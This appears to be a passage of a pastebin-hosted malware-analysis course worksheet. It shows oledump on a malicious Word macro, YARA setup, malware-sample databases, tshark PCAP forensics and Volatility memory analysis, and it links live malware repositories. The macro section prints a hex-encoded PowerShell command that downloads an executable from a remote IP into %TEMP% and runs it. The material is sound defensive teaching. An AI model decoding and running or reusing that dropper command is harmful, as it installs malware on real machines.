  957. cd ~/Desktop/oledump
  958.  
  959. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  960.  
  961. unzip oledump_V0_0_22.zip
  962.  
  963. cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
  964.  
  965. mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
  966.  
  967. python oledump.py 064016.doc
  968.  
  969. python oledump.py 064016.doc -s A4 -v
  970.  
  971. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  972. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  973.  
  974.  
  975. python oledump.py 064016.doc -s A5 -v
  976.  
  977. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  978.  
  979.  
  980. python oledump.py 064016.doc -s A3 -v
  981.  
  982. - Look for "GVhkjbjv" and you should see:
  983.  
  984. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  985.  
  986. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  987. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  988.  
  989.  
  990.  
  991.  
  992. ##############
  993. # Yara Ninja #
  994. ##############
  995. sudo apt-get remove -y yara
  996.  
  997. wget https://github.com/plusvic/yara/archive/v3.4.0.zip
  998.  
  999. sudo apt-get -y install libtool
  1000.  
  1001. unzip v3.4.0.zip
  1002.  
  1003. cd yara-3.4.0
  1004.  
  1005. ./bootstrap.sh
  1006.  
  1007. ./configure
  1008.  
  1009. make
  1010.  
  1011. sudo make install
  1012.  
  1013. yara -v
  1014.  
  1015. cd ..
  1016.  
  1017. wget https://github.com/Yara-Rules/rules/archive/master.zip
  1018.  
  1019. unzip master.zip
  1020.  
  1021. cd ~/Desktop
  1022.  
  1023. yara rules-master/packer.yar malcode/malware.exe
  1024.  
  1025.  
  1026. Places to get more Yara rules:
  1027. ------------------------------
  1028. https://malwareconfig.com/static/yaraRules/
  1029. https://github.com/kevthehermit/YaraRules
  1030. https://github.com/VectraThreatLab/reyara
  1031.  
  1032.  
  1033.  
  1034. Yara rule sorting script:
  1035. -------------------------
  1036. https://github.com/mkayoh/yarasorter
  1037.  
  1038.  
  1039.  
  1040. cd ~/Desktop/rules-master
  1041. for i in $( ls --hide=master.yar ); do echo include \"$i\";done > master.yar
  1042. cd ~/Desktop/
  1043. yara rules-master/master.yar malcode/malware.exe
  1044.  
  1045.  
  1046.  
  1047.  
  1048.  
  1049.  
  1050.  
  1051.  
  1052.  
  1053.  
  1054. Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
  1055. http://derekmorton.name/files/malware_12-14-12.sql.bz2
  1056.  
  1057.  
  1058. Malware Repositories:
  1059. http://malshare.com/index.php
  1060. http://www.malwareblacklist.com/
  1061. http://www.virusign.com/
  1062. http://virusshare.com/
  1063. http://www.tekdefense.com/downloads/malware-samples/
  1064.  
  1065.  
  1066.  
  1067.  
  1068. ###############################
  1069. # Creating a Malware Database #
  1070. ###############################
  1071.  
  1072. Creating a malware database (sqlite)
  1073. ------------------------------------
  1074. sudo apt-get install -y python-simplejson python-simplejson-dbg
  1075. wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
  1076. wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
  1077. unzip malware-password-is-infected.zip
  1078. infected
  1079. python avsubmit.py --init
  1080. python avsubmit.py -f malware.exe -e
  1081.  
  1082.  
  1083.  
  1084.  
  1085.  
  1086. Creating a malware database (mysql)
  1087. -----------------------------------
  1088. - Step 1: Installing MySQL database
  1089. - Run the following command in the terminal:
  1090.  
  1091. sudo apt-get install mysql-server
  1092.  
  1093. - Step 2: Installing Python MySQLdb module
  1094. - Run the following command in the terminal:
  1095.  
  1096. sudo apt-get build-dep python-mysqldb
  1097. sudo apt-get install python-mysqldb
  1098.  
  1099. Step 3: Logging in
  1100. Run the following command in the terminal:
  1101.  
  1102. mysql -u root -p (set a password of 'malware')
  1103.  
  1104. - Then create one database by running following command:
  1105.  
  1106. create database malware;
  1107.  
  1108. exit;
  1109.  
  1110. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  1111.  
  1112. vi mal_to_db.py (fill in database connection information)
  1113.  
  1114. python mal_to_db.py -i
  1115.  
  1116. python mal_to_db.py -f malware.exe -u
  1117.  
  1118.  
  1119. mysql -u root -p
  1120. malware
  1121.  
  1122. mysql> use malware;
  1123.  
  1124. select id,md5,sha1,sha256,time FROM files;
  1125.  
  1126. mysql> quit;
  1127.  
  1128.  
  1129.  
  1130.  
  1131.  
  1132. #################
  1133. # PCAP Analysis #
  1134. #################
  1135. cd /home/malware/Desktop/Browser\ Forensics
  1136.  
  1137. ls | grep pcap
  1138.  
  1139. perl chaosreader.pl suspicious-time.pcap
  1140.  
  1141. firefox index.html
  1142.  
  1143. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  1144.  
  1145. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  1146.  
  1147. sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
  1148.  
  1149.  
  1150. for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  1151.  
  1152.  
  1153.  
  1154.  
  1155.  
  1156. #############################
  1157. # PCAP Analysis with tshark #
  1158. #############################
  1159. tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  1160.  
  1161.  
  1162. tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  1163.  
  1164.  
  1165. tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
  1166.  
  1167.  
  1168. tshark –r suspicious-time.pcap -Tfields -e “eth.src” | sort | uniq
  1169.  
  1170.  
  1171. tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
  1172.  
  1173. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
  1174.  
  1175. tshark -r suspicious-time.pcap -qz ip_hosts,tree
  1176.  
  1177. tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  1178.  
  1179. tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  1180.  
  1181.  
  1182. whois rapidshare.com.eyu32.ru
  1183.  
  1184. whois sploitme.com.cn
  1185.  
  1186.  
  1187. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  1188.  
  1189. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  1190.  
  1191. tshark -r suspicious-time.pcap -qz http_req,tree
  1192.  
  1193. tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  1194.  
  1195. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  1196.  
  1197.  
  1198.  
  1199. ######################################
  1200. # PCAP Analysis with forensicPCAP.py #
  1201. ######################################
  1202. cd ~/Desktop
  1203. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
  1204. sudo easy_install cmd2
  1205.  
  1206. python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
  1207.  
  1208. ForPCAP >>> help
  1209.  
  1210.  
  1211. Prints stats about PCAP
  1212. ForPCAP >>> stat
  1213.  
  1214.  
  1215. Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  1216. ForPCAP >>> dns
  1217.  
  1218. ForPCAP >>> show
  1219.  
  1220.  
  1221. Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  1222. ForPCAP >>> dstports
  1223.  
  1224. ForPCAP >>> show
  1225.  
  1226.  
  1227. Prints the number of ip source and store them.
  1228. ForPCAP >>> ipsrc
  1229.  
  1230.  
  1231. Prints the number of web's requests and store them
  1232. ForPCAP >>> web
  1233.  
  1234.  
  1235. Prints the number of mail's requests and store them
  1236. ForPCAP >>> mail
  1237.  
  1238.  
  1239.  
  1240. ###################
  1241. # Memory Analysis #
  1242. ###################
  1243. cd /home/malware/Desktop/Banking\ Troubles/Volatility
  1244.  
  1245. python volatility
  1246. python volatility pslist -f ../hn_forensics.vmem
  1247. python volatility connscan2 -f ../hn_forensics.vmem
  1248. python volatility memdmp -p 888 -f ../hn_forensics.vmem
  1249. python volatility memdmp -p 1752 -f ../hn_forensics.vmem
  1250. ***Takes a few min***
  1251. strings 1752.dmp | grep "^http://" | sort | uniq
  1252. strings 1752.dmp | grep "Ahttps://" | uniq -u
  1253. cd ..
  1254. foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
  1255. cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
  1256. cat audit.txt
  1257. cd pdf
  1258. ls
  1259. grep -i javascript *.pdf
  1260.  
  1261.  
  1262.  
  1263. cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
  1264. wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
  1265. unzip pdf-parser_V0_6_4.zip
  1266. python pdf-parser.py -s javascript --raw 00600328.pdf
  1267. python pdf-parser.py --object 11 00600328.pdf
  1268. python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
  1269.  
  1270. cat malicious.js
  1271.  
  1272.  
  1273. *****Sorry - no time to cover javascript de-obfuscation today*****
  1274.  
  1275.  
  1276. cd /home/malware/Desktop/Banking\ Troubles/Volatility/
  1277. python volatility files -f ../hn_forensics.vmem > files
  1278. cat files | less
  1279. python volatility malfind -f ../hn_forensics.vmem -d out
  1280. ls out/
  1281. python volatility hivescan -f ../hn_forensics.vmem
  1282. python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
  1283. for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement